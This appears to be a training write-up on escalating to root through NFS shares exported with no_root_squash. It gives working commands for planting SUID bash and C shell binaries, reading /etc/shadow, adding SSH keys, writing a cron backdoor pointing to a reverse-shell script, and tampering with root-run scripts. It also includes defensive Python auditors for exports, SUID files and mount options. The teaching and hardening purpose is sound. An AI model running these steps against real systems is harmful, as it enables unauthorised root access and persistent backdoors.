NFS Privilege Escalation

Intermediate | 25 min | Writeup

Exploiting NFS misconfigurations

Learning Objectives

  • Enumerate NFS shares
  • Exploit no_root_squash
  • Create SUID files via NFS
  • Mount NFS shares

NFS (Network File System) shares can be a goldmine for privilege escalation. When NFS is misconfigured with "no_root_squash", you can create SUID binaries as root from your attack machine that execute on the target. It's like leaving a master key maker unguarded.

Think of NFS like a shared folder between computers. Normally, even if you mount it as root, the server "squashes" your root privileges (root_squash). But with no_root_squash, root on your machine = root on the share. Create a SUID binary, and boom - root on the target.

Requires Network Access

NFS exploitation requires network access to the target. You typically need a shell on the system to discover NFS misconfigurations, then use your attack machine to exploit them.

Enumerating NFS

```bash
# On target: check for NFS exports
cat /etc/exports
# Example output:
# /home/backup *(rw,sync,no_root_squash)
# /var/shared 192.168.1.0/24(rw,sync)
# /opt/files *(rw,no_root_squash,insecure)

# Look for no_root_squash - that's the vulnerability!

# Show the export list (what the server offers to clients)
showmount -e localhost
showmount -e 127.0.0.1

# Check mount points
mount | grep nfs
cat /proc/mounts | grep nfs

# From attack machine: enumerate NFS
showmount -e TARGET_IP
# Export list:
# /home/backup *
# /opt/files *

# Check NFS service
rpcinfo -p TARGET_IP | grep nfs
# 100003 3 tcp 2049 nfs
# 100003 4 tcp 2049 nfs
```

Understanding NFS Options

```
NFS Export Options:
├── rw - Read/write access
├── ro - Read-only access
├── sync - Sync writes immediately
├── async - Buffer writes (faster, less safe)
├── root_squash - Map root to nobody (DEFAULT - safe)
├── no_root_squash - Root stays root (DANGEROUS!)
├── all_squash - Map all users to nobody
├── no_all_squash - Keep user mappings (default)
├── insecure - Allow connections from ports > 1024
└── secure - Require ports < 1024 (default)

Dangerous Combinations:
├── rw + no_root_squash = Create SUID files as root
├── rw + insecure = Easier to connect from attack machine
└── rw + * (any host) = Anyone can mount

Safe Configurations:
├── ro = Can't write anything
├── root_squash = Root becomes nobody
└── Specific IP restrictions
```
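As an added example (this is not code from the original writeup), the following Python script parses an /etc/exports file and flags the dangerous combinations listed above: rw together with no_root_squash, a wildcard host, and the insecure option. The sample file is constructed from the example lines shown earlier on this page. It also prints what the hardened line would look like, swapping no_root_squash and insecure for their safe defaults; host restrictions are only flagged, since the right subnet is something only the administrator knows.

```python
"""Audit an /etc/exports file for the dangerous option combinations above.

Added example, not part of the original writeup. Format parsed:
    /path  host1(opt,opt)  host2(opt,...)   # comment
A missing option list or a missing host means the defaults ("*" for the
host, root_squash for the options) apply, so both are handled explicitly.
"""
import re

# Constructed sample exports file, mirroring the example output on this page.
SAMPLE_EXPORTS = """\
# /etc/exports: the access control list for filesystems which may be exported
/home/backup *(rw,sync,no_root_squash)
/var/shared 192.168.1.0/24(rw,sync)
/opt/files *(rw,no_root_squash,insecure)
/srv/ro 10.0.0.5(ro,sync)
"""

# Matches "host(opt,opt)", a bare "host", or a bare "(opt,opt)".
CLIENT_RE = re.compile(r"^(?P<host>[^(\s]*)(?:\((?P<opts>[^)]*)\))?$")


def parse_exports(text):
    """Return [(path, [(host, [option, ...]), ...]), ...] for each export line."""
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        fields = line.split()
        path, clients = fields[0], []
        for spec in fields[1:]:
            m = CLIENT_RE.match(spec)
            if not m:
                continue
            host = m.group("host") or "*"        # bare "(opts)" applies to every host
            opts = [o for o in (m.group("opts") or "").split(",") if o]
            clients.append((host, opts))
        if not clients:                           # no client list at all: exported to the world
            clients.append(("*", []))
        exports.append((path, clients))
    return exports


def audit_exports(text):
    """Return findings as (path, host, severity, message) tuples."""
    findings = []
    for path, clients in parse_exports(text):
        for host, opts in clients:
            if "no_root_squash" in opts:
                if "rw" in opts:
                    findings.append((path, host, "HIGH",
                                     "rw + no_root_squash: client root can plant SUID files"))
                else:
                    findings.append((path, host, "MEDIUM",
                                     "no_root_squash: client root can read every file on the share"))
            if host == "*":
                findings.append((path, host, "MEDIUM",
                                 "exported to every host: restrict to a host, subnet or netgroup"))
            if "insecure" in opts:
                findings.append((path, host, "LOW",
                                 "insecure: mounts accepted from unprivileged source ports"))
    return findings


def harden_options(opts):
    """Swap dangerous options for their safe counterparts; keep everything else."""
    swap = {"no_root_squash": "root_squash", "insecure": "secure"}
    hardened = [swap.get(o, o) for o in opts]
    if "root_squash" not in hardened and "all_squash" not in hardened:
        hardened.append("root_squash")            # the default, made explicit
    return hardened


def hardened_line(path, clients):
    """Render an export line with hardened options (host restrictions are left to the admin)."""
    specs = [f"{host}({','.join(harden_options(opts))})" for host, opts in clients]
    return path + " " + " ".join(specs)


if __name__ == "__main__":
    for path, host, sev, msg in audit_exports(SAMPLE_EXPORTS):
        print(f"[{sev}] {path} {host}: {msg}")
    print("\nSuggested hardened lines:")
    for path, clients in parse_exports(SAMPLE_EXPORTS):
        print(" ", hardened_line(path, clients))
```

Run it against a real file with `audit_exports(open("/etc/exports").read())`; an export with no findings is one that is read-only or squashes root and is limited to a named host or subnet.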

Exploiting no_root_squash

```bash
# Scenario: /etc/exports on target:
# /home/backup *(rw,sync,no_root_squash)

# On attack machine (as root):
# 1. Create mount point
mkdir /tmp/nfs
mount -t nfs TARGET_IP:/home/backup /tmp/nfs

# 2. Verify mount
df -h | grep nfs
# TARGET_IP:/home/backup 10G 5.0G 5.0G 50% /tmp/nfs

# 3. Create SUID binary
# Method 1: Copy bash and set SUID
cp /bin/bash /tmp/nfs/rootbash
chmod +s /tmp/nfs/rootbash

# Method 2: Create C program
cat > /tmp/nfs/shell.c << 'EOF'
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    system("/bin/bash -p");
    return 0;
}
EOF

# Compile as root (on the attack machine)
gcc /tmp/nfs/shell.c -o /tmp/nfs/shell
chmod +s /tmp/nfs/shell

# 4. Unmount
umount /tmp/nfs

# 5. On target, execute the SUID binary
# Find where the share is mounted
df -h | grep nfs
# Or check: mount | grep nfs

# Execute our backdoor
/home/backup/rootbash -p
# Or
/home/backup/shell

# You're root!
id
# uid=0(root) gid=0(root)
```
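From the defender's side, the artefact the steps above leave behind is a root-owned setuid file sitting on the exported directory. As an added example (not part of the original writeup), this Python scanner walks a directory tree and reports setuid/setgid regular files with their mode and owner, which is the same check `find -perm /6000` performs but with symlinks excluded so a link to /bin/bash cannot spoof a hit. The demo tree it builds under a temporary directory is constructed for illustration; in practice the root would be each exported path on the server or each NFS mount point on a client, run on a schedule.

```python
"""Scan a directory tree (an exported or mounted NFS path) for setuid/setgid files.

Added example, not part of the original writeup. Regular files carrying the
setuid or setgid bit are reported with their owner; a planted "rootbash" or
"shell" shows up as a uid 0 entry. Symlinks are skipped via lstat so a link
pointing at /bin/bash is not reported as if it were a setuid file.
"""
import os
import stat
import tempfile


def find_setid_files(root):
    """Return sorted [(path, mode_octal, uid)] for every regular file with S_ISUID or S_ISGID."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):   # followlinks=False by default
        for name in filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)                            # lstat: never follow symlinks
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append((path, oct(stat.S_IMODE(st.st_mode)), st.st_uid))
    return sorted(hits)


def root_owned(hits):
    """Keep only files owned by uid 0: the ones that actually grant root when executed."""
    return [h for h in hits if h[2] == 0]


def build_demo_tree():
    """Constructed sample tree: one setuid file, one setgid file, one plain file, one symlink."""
    root = tempfile.mkdtemp(prefix="nfs-scan-")
    os.makedirs(os.path.join(root, "scripts"))
    paths = {
        "suid": os.path.join(root, "rootbash"),
        "sgid": os.path.join(root, "scripts", "helper"),
        "plain": os.path.join(root, "scripts", "backup.sh"),
    }
    for p in paths.values():
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\n")
    os.chmod(paths["suid"], 0o4755)
    os.chmod(paths["sgid"], 0o2755)
    os.chmod(paths["plain"], 0o755)
    os.symlink("/bin/sh", os.path.join(root, "link-to-sh"))   # must not be reported
    return root, paths


if __name__ == "__main__":
    demo_root, _ = build_demo_tree()
    for path, mode, uid in find_setid_files(demo_root):
        print(f"{mode} uid={uid} {path}")
```

A baseline of known setuid files per export, compared against each scan, turns this into a simple integrity check: any new uid 0 setuid file on a share is worth an incident ticket.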

Must Be Root on Attacker

To create SUID binaries on NFS with no_root_squash, you must be root on your attack machine. The whole point is that root on your machine = root on the share.

Alternative Exploitation Methods

```bash
# Method 3: Create SUID for any command
# If you need specific functionality:

# SUID vim (file editing as root)
cp /usr/bin/vim /tmp/nfs/suidvim
chmod +s /tmp/nfs/suidvim
# On target: /mount/path/suidvim /etc/shadow

# SUID cat (read any file)
cp /bin/cat /tmp/nfs/suidcat
chmod +s /tmp/nfs/suidcat
# On target: /mount/path/suidcat /etc/shadow

# Method 4: Just write files as root
# Even without SUID, you can write anywhere on the share

# Add SSH key to root (if the share is root's home directory)
mkdir /tmp/nfs/.ssh 2>/dev/null
echo "YOUR_SSH_PUBLIC_KEY" >> /tmp/nfs/.ssh/authorized_keys
chmod 700 /tmp/nfs/.ssh
chmod 600 /tmp/nfs/.ssh/authorized_keys

# Write cron job (if the share contains a cron.d directory that root reads)
echo "* * * * * root /tmp/revshell.sh" >> /tmp/nfs/cron.d/backdoor

# Method 5: Modify existing scripts
# If the share contains executable scripts run by root:
echo "cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash" >> /tmp/nfs/scripts/backup.sh
```

Troubleshooting NFS Mounts

```bash
# Common mount errors and solutions

# Error: mount.nfs: access denied
# Cause: IP not in allowed list or permissions
# Solution: Check /etc/exports for IP restrictions

# Error: mount.nfs: Connection refused
# Cause: NFS service not running or firewall
# Check: rpcinfo -p TARGET_IP
# Ports: 111 (rpcbind), 2049 (nfs)

# Error: mount.nfs: Protocol not supported
# Cause: NFS version mismatch
# Solution: Try a specific version
mount -t nfs -o vers=3 TARGET_IP:/share /tmp/nfs
mount -t nfs -o vers=4 TARGET_IP:/share /tmp/nfs

# Error: mount: wrong fs type...
# Cause: Missing NFS client
# Solution: Install nfs-common
apt install nfs-common   # Debian/Ubuntu
yum install nfs-utils    # RHEL/CentOS

# Error: Operation not permitted (setting SUID)
# Cause: root_squash is enabled (not vulnerable)
# Check: cat /etc/exports on target

# Verify that the SUID bit was set
ls -la /tmp/nfs/rootbash
# Should show: -rwsr-sr-x (the 's' indicates SUID)

# If the 's' is not showing, no_root_squash isn't working
# Or the filesystem doesn't support SUID (mount options)
```

Check Mount Options

Some shares are mounted on the target with the "nosuid" option, which makes the SUID bit ineffective even when the export itself allows it. Check both /etc/exports AND the actual mount options on the target.
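As an added example (not from the original writeup), this Python check reads the /proc/mounts format that the page's `cat /proc/mounts | grep nfs` command prints, picks out the nfs and nfs4 mounts, and reports which of nosuid and nodev each one is missing. Those two client-side options are what make a planted SUID binary or device node inert regardless of what the server exports. The sample content is constructed; the octal-escape handling covers mount points that contain spaces, which the kernel writes as \040.

```python
r"""Check the client-side mount options of NFS mounts (the /proc/mounts view).

Added example, not part of the original writeup. Each /proc/mounts line is
    source mountpoint fstype options dump pass
with spaces, tabs, newlines and backslashes in paths escaped as \ooo octal
sequences (a space is \040). The report lists every nfs/nfs4 mount together
with the hardening options it lacks.
"""
import re

# Constructed sample of /proc/mounts content (raw string, so \040 stays literal).
SAMPLE_PROC_MOUNTS = r"""/dev/sda1 / ext4 rw,relatime 0 0
TARGET:/home/backup /mnt/backup nfs4 rw,relatime,vers=4.2,hard,proto=tcp,addr=10.0.0.7 0 0
fileserver:/var/shared /mnt/shared nfs rw,nosuid,nodev,noexec,relatime,vers=3,addr=10.0.0.8 0 0
nas:/media /mnt/my\040media nfs4 rw,nodev,relatime,vers=4.1,addr=10.0.0.9 0 0
"""

# Options that neutralise SUID binaries and device files on a share.
WANTED = ("nosuid", "nodev")

_OCTAL = re.compile(r"\\([0-7]{3})")


def unescape(field):
    """Decode the \\ooo escapes the kernel uses in /proc/mounts fields."""
    return _OCTAL.sub(lambda m: chr(int(m.group(1), 8)), field)


def parse_proc_mounts(text):
    """Return a list of dicts with source, mountpoint, fstype and the option list."""
    mounts = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:                      # malformed or blank line
            continue
        mounts.append({
            "source": unescape(fields[0]),
            "mountpoint": unescape(fields[1]),
            "fstype": fields[2],
            "options": fields[3].split(","),
        })
    return mounts


def nfs_mounts(text):
    """Only the NFS mounts (both the v3 'nfs' and the 'nfs4' filesystem types)."""
    return [m for m in parse_proc_mounts(text) if m["fstype"] in ("nfs", "nfs4")]


def missing_hardening(mount):
    """Return the hardening options absent from one mount, in WANTED order."""
    return [o for o in WANTED if o not in mount["options"]]


def report(text):
    """Map each NFS mountpoint to the options it is missing (empty list = hardened)."""
    return {m["mountpoint"]: missing_hardening(m) for m in nfs_mounts(text)}


if __name__ == "__main__":
    for mountpoint, missing in report(SAMPLE_PROC_MOUNTS).items():
        status = "ok" if not missing else "missing " + ",".join(missing)
        print(f"{mountpoint}: {status}")
```

On a live system call `report(open("/proc/mounts").read())`; a mount that comes back with an empty list already carries nosuid and nodev, so a SUID file written through no_root_squash on the server cannot be used to escalate on that client.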

Exploitation Without Root on Attacker

```bash
# If you don't have root on attack machine:

# Method 1: Use SSH forwarding
# If you have SSH access to target:
ssh -L 2049:localhost:2049 user@TARGET

# Then mount through tunnel (still needs root for mount)

# Method 2: Check for writable content
# Even with root_squash, you write as your own user
# Mount and look for:
# - Writable config files
# - Credentials
# - SSH keys
# - Writable scripts that root runs

# Method 3: Use the target itself
# If target is NFS client of another vulnerable server:
# Pivot from target to attack NFS on other machines

# Method 4: Docker/VM
# Create root container/VM on attack machine
docker run --rm -it --privileged -v /tmp/nfs:/mnt alpine
# Inside container as root, create SUID binary
```

Finding Mounted NFS on Target

```bash
# On target, find where NFS shares are mounted

# Method 1: Check mount
mount | grep nfs
mount | grep -i "type nfs"

# Method 2: Check /proc/mounts
cat /proc/mounts | grep nfs

# Method 3: Check df
df -h -t nfs
df -h -t nfs4

# Method 4: Check fstab for auto-mounts
cat /etc/fstab | grep nfs

# Method 5: findmnt command
findmnt -t nfs
findmnt -t nfs4

# Example output:
# TARGET:/home/backup on /mnt/backup type nfs4 (rw,sync)

# The mount point on target is /mnt/backup
# That's where your SUID binary will be!
```

NFS Exploitation Methodology

NFS Privilege Escalation Flow

1. Find Exports: cat /etc/exports on target
2. Identify Vuln: look for no_root_squash + rw
3. Mount: mount the share as root from the attack machine
4. Create SUID: copy bash or compile a SUID binary
5. Set Permissions: chmod +s on the binary
6. Execute: run the SUID binary on the target as root

Knowledge Check

Quick Quiz

What does no_root_squash mean in NFS exports?

Challenges

NFS Root Squash Bypass

Challenge
🔥 intermediate

Target exports /home/shared with *(rw,no_root_squash). The share is mounted at /mnt/shared on the target. Create a SUID backdoor and escalate to root.


Key Takeaways

  • Check /etc/exports for no_root_squash + rw shares
  • no_root_squash means root on client = root on share
  • Mount share on attack machine, create SUID binary as root
  • Execute SUID binary on target for root access
  • Must have root on attack machine to exploit
  • Find mount point on target with mount | grep nfs